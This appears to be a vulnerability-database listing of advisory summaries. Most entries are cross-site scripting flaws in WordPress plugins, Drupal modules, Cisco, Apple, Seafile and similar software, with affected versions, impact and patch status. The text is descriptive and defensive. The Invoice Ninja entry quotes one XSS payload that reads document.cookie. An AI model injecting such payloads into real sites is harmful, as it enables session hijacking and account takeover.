A Reflected Cross-Site Scripting (XSS) vulnerability exists in the themepassion Legacy Admin WordPress plugin affecting versions up to and including 9.5, which allows attackers to inject malicious scripts into web pages viewed by other users. The vulnerability stems from improper input neutralization during web page generation (CWE-79), enabling arbitrary JavaScript execution in victims' browsers. An attacker can craft a malicious URL containing unfiltered input and trick users into clicking it, potentially leading to session hijacking, credential theft, or malware distribution.
A Reflected Cross-Site Scripting (XSS) vulnerability exists in the Ultra WordPress Admin plugin (themepassion) through version 11.7, allowing attackers to inject malicious scripts into web pages viewed by administrators and users. The vulnerability stems from improper neutralization of user input during web page generation, classified under CWE-79. An attacker can craft a malicious URL containing JavaScript payloads that execute in the context of an authenticated user's browser session, potentially leading to session hijacking, credential theft, or unauthorized administrative actions without requiring authentication themselves.
A Reflected Cross-Site Scripting (XSS) vulnerability exists in the G5Theme Handmade Framework WordPress plugin through version 3.9, allowing attackers to inject malicious scripts into web pages viewed by other users. The vulnerability stems from improper neutralization of user input during web page generation, classified under CWE-79. Attackers can craft malicious URLs containing JavaScript payloads that execute in victims' browsers when clicked, potentially leading to session hijacking, credential theft, or malware distribution.
A Reflected Cross-Site Scripting (XSS) vulnerability exists in the WordPress plugin 'My auctions allegro' (free edition) through version 3.6.35, allowing attackers to inject malicious scripts into web pages viewed by victims. An unauthenticated attacker can craft a malicious URL containing JavaScript code that executes in the victim's browser when clicked, potentially stealing session cookies, redirecting users, or performing actions on behalf of the user. No CVSS score, EPSS score, or KEV status has been assigned, and patch availability status is unclear, though the vulnerability was identified and reported by Patchstack security researchers.
G5Theme Zorka WordPress theme versions up to and including 1.5.7 contain a Reflected Cross-Site Scripting (XSS) vulnerability that fails to properly neutralize user input during web page generation. An attacker can craft a malicious URL containing JavaScript payload and trick users into clicking it, allowing the attacker to execute arbitrary JavaScript in the victim's browser session, potentially stealing session cookies, credentials, or performing actions on behalf of the user. No CVSS score, EPSS probability, or KEV status has been assigned, but the vulnerability is confirmed by Patchstack with a clear attack vector.
Cisco Catalyst SD-WAN Manager's web interface contains a reflected cross-site scripting (XSS) vulnerability that requires user interaction and authentication to exploit. An attacker can craft a malicious link to execute arbitrary JavaScript in a victim's browser session, potentially stealing sensitive information or performing unauthorized actions within the management interface. No patch is currently available.
A stored cross-site scripting (XSS) vulnerability exists in the web-based Cisco IOx application hosting environment management interface within Cisco IOS XE Software, allowing authenticated remote attackers with administrative credentials to inject malicious scripts that execute in the context of other users' browser sessions. Successful exploitation enables arbitrary script execution and access to sensitive browser-based information affecting a wide range of Cisco IOS XE versions from 16.6.1 through 17.18.1a. This vulnerability requires valid administrative credentials and user interaction but poses a significant risk in multi-administrator environments where privilege escalation or lateral movement could occur.
The Drupal Responsive Favicons module contains an improper input neutralization vulnerability that allows attackers to inject malicious JavaScript code into web pages (Cross-Site Scripting/XSS). All versions from 0.0.0 up to and including 2.0.1 are affected, with the vulnerability classified under CWE-79 (Improper Neutralization of Input During Web Page Generation). While no CVSS score or EPSS probability metric is currently available, the vulnerability is documented in the official Drupal security advisory (SA-CONTRIB-2026-019) and has been assigned EUVD-2026-15479, indicating this is a confirmed security flaw requiring immediate patching.
A Cross-Site Scripting (XSS) vulnerability exists in the Drupal SAML SSO - Service Provider module due to improper neutralization of user input during web page generation. All versions prior to 3.1.3 are affected, allowing attackers to inject malicious scripts that execute in the browsers of users interacting with SAML authentication flows. The vulnerability is classified as CWE-79 (Improper Neutralization of Input During Web Page Generation), and while no CVSS score or EPSS data is currently available, the nature of XSS in authentication modules represents a significant risk to credential theft and session hijacking.
A Cross-Site Scripting (XSS) vulnerability exists in Drupal Islandora due to improper neutralization of user input during web page generation. All versions of Islandora from 0.0.0 through 2.17.4 are affected, allowing attackers to inject and execute malicious JavaScript in the context of affected users' browsers. Exploitation enables session hijacking, credential theft, malware distribution, and defacement of the repository interface.
A Cross-Site Scripting (XSS) vulnerability exists in the Drupal Anti-Spam by CleanTalk module due to improper neutralization of user input during web page generation. All versions from 0.0.0 through 9.6.x are affected, with a patch available in version 9.7.0 or later. Attackers can inject malicious scripts that execute in the context of authenticated users' browsers, potentially leading to session hijacking, credential theft, or defacement of Drupal sites.
A stored cross-site scripting (XSS) vulnerability exists in Kiteworks Secure Data Forms that allows authenticated attackers to inject malicious scripts when modifying forms. Kiteworks Secure Data Forms versions prior to 9.2.1 are affected, enabling attackers with low-level privileges to execute arbitrary JavaScript in victims' browsers. There is no indication this vulnerability is actively exploited (not in CISA KEV), and no public proof-of-concept has been identified in available intelligence.
A Cross-Site Scripting (XSS) vulnerability exists in Drupal Tagify module versions prior to 1.2.49, stemming from improper neutralization of user input during web page generation. An attacker can inject malicious scripts that execute in the context of other users' browsers, potentially leading to session hijacking, credential theft, or malware distribution. This vulnerability affects all Tagify installations from version 0.0.0 through 1.2.48, and patch availability has been confirmed through the Drupal security advisory.
A Cross-Site Scripting (XSS) vulnerability exists in the Drupal UI Icons module due to improper neutralization of user input during web page generation. This vulnerability affects UI Icons versions 0.0.0 through 1.0.0 and versions 1.1.0 through 1.1.0, allowing attackers to inject malicious scripts that execute in the context of victim browsers. No CVSS score, EPSS data, or confirmed KEV status is currently available; however, the XSS classification and Drupal reporting indicate this requires prompt patching to versions 1.0.1 or 1.1.1.
A Cross-Site Scripting (XSS) vulnerability exists in Drupal Quick Edit due to improper neutralization of user input during web page generation. This vulnerability affects Quick Edit versions 0.0.0 through 1.0.4 and versions 2.0.0 through 2.0.0, allowing attackers to inject malicious scripts that execute in the context of authenticated users' browsers. The vulnerability is classified under CWE-79 (Improper Neutralization of Input During Web Page Generation) and has been disclosed by the Drupal security team with patches available for affected versions.
A Reflected Cross-Site Scripting (XSS) vulnerability exists in Support Board v3.7.7 that allows unauthenticated attackers to inject malicious JavaScript code via the 'search' parameter in the '/supportboard/include/articles.php' endpoint. Successful exploitation enables attackers to steal session cookies, perform unauthorized actions on behalf of victims, or harvest sensitive user data through victim browsers. A vendor patch is available, and the vulnerability has been officially reported by INCIBE, indicating moderate real-world attention.
A Cross-Site Scripting (XSS) vulnerability exists in Ericsson Indoor Connect 8855 versions prior to 2025.Q3, classified as CWE-79 (Improper Neutralization of Input During Web Page Generation). An attacker can inject malicious scripts into the web interface, potentially leading to unauthorized disclosure and modification of sensitive information. No CVSS score, EPSS data, or KEV status is currently available, and no public proof-of-concept has been disclosed, though the vulnerability has been formally documented by Ericsson's Product Security Incident Response Team (PSIRT).
A Cross-Site Scripting (XSS) vulnerability exists in the Analytics probe component of Hitachi Infrastructure Analytics Advisor and Hitachi Ops Center Analyzer. The flaw allows authenticated attackers with low privileges to execute malicious scripts in users' browsers, potentially leading to high confidentiality impact, low integrity impact, and low availability impact due to the changed scope (CVSS 8.2). There is no current indication of active exploitation (not in CISA KEV) or publicly available proof-of-concept code.
The Easy Image Gallery plugin for WordPress contains a Stored Cross-Site Scripting (XSS) vulnerability in the Gallery shortcode post meta field that affects all versions up to and including 1.5.3. Authenticated attackers with Contributor-level access or higher can inject arbitrary JavaScript that executes in the browsers of users viewing the affected pages, potentially compromising user sessions, stealing credentials, or performing actions on behalf of legitimate users. The vulnerability stems from insufficient input sanitization and output escaping in the shortcode handler, as documented in the WordPress plugin repository source code.
A logic error in Apple's script message handler implementation allows malicious websites to access script message handlers intended for other origins, resulting in unauthorized cross-origin information disclosure. This vulnerability affects Safari 26.4 and earlier, iOS/iPadOS 18.7.7 and earlier, macOS Tahoe 26.4 and earlier, and visionOS 26.4 and earlier. An attacker can craft a malicious website that exploits improper state management in the message handler routing mechanism to intercept sensitive data intended for legitimate web applications, potentially exposing authentication tokens, user data, or other confidential information passed through script messaging interfaces.
A cross-site scripting (XSS) vulnerability exists in Apple's Safari browser and iOS/iPadOS operating systems due to insufficient input validation in website content handling. An attacker can craft a malicious website that, when visited by a user, executes arbitrary JavaScript in the context of the victim's browser, potentially stealing credentials, session tokens, or performing actions on behalf of the user. Apple has released patches across Safari 26.4, iOS 18.7.7, iPadOS 18.7.7, iOS 26.4, iPadOS 26.4, and macOS Tahoe 26.4 to address this logic flaw, though no CVSS score, EPSS data, or KEV status has been publicly disclosed, suggesting this may be a proactive disclosure rather than an actively exploited vulnerability.
Multiple stored cross-site scripting (XSS) vulnerabilities exist in Seafile Server's Seadoc (sdoc) editor that fail to sanitize WebSocket messages related to document structure updates. Authenticated remote attackers can inject malicious JavaScript payloads through the src attribute of embedded Excalidraw whiteboards or the href attribute of anchor tags, affecting Seafile Server versions 13.0.15, 13.0.16-pro, 12.0.14 and prior. A proof-of-concept has been publicly disclosed on GitHub, and patches are available in versions 13.0.17, 13.0.17-pro, and 12.0.20-pro.
Invoice Ninja v5.13.0 and earlier contain a stored cross-site scripting (XSS) vulnerability in invoice line item descriptions that bypass the application's XSS denylist filter, allowing authenticated attackers to inject malicious JavaScript that executes when invoices are viewed in PDF preview or the client portal. Any authenticated user can create or modify invoices to inject payloads such as `<img src=x onerror=alert(document.cookie)>`, and victims viewing the invoice-including clients with lower privilege levels-will have the payload execute in their browser context, enabling session hijacking, account takeover, and data exfiltration. A patch is available in v5.13.4 via the vendor's GitHub repository.
A stored cross-site scripting (XSS) vulnerability exists in Wallos versions prior to 4.7.0 within the payment method rename endpoint that allows authenticated users to inject arbitrary JavaScript code. When any user visits the Settings, Subscriptions, or Statistics pages, the injected malicious script executes in their browser context. This vulnerability is compounded by the wallos_login authentication cookie lacking the HttpOnly flag, enabling attackers to steal session tokens and achieve full account compromise through session hijacking.
A stored cross-site scripting (XSS) vulnerability exists in Authelia version 4.39.15 due to improper neutralization of the language cookie value when rendering HTML templates. This vulnerability only affects users who have deliberately disabled or modified the default Content Security Policy with unsafe directives (such as unsafe-inline scripts or arbitrary domain connections); default installations are completely protected. An attacker could potentially inject malicious JavaScript into the Authelia login page if multiple preconditions are met, including a secondary application vulnerability on the same domain, CSP misconfiguration, and the ability to manipulate cookies.
Vikunja Desktop (Electron wrapper) versions 0.21.0 through 2.1.x contain a critical remote code execution vulnerability caused by enabled Node.js integration combined with missing navigation controls. An attacker who is a legitimate user on a shared Vikunja instance can inject a malicious hyperlink into user-generated content (task descriptions, comments, project descriptions) that, when clicked by a victim using Vikunja Desktop, causes arbitrary code execution with the victim's OS user privileges. A proof-of-concept demonstrating command execution via a simple HTML link has been documented, and the vulnerability affects all Desktop users on affected versions.
Quick Facts
- Typical Severity
- MEDIUM
- Category
- web
- Total CVEs
- 38830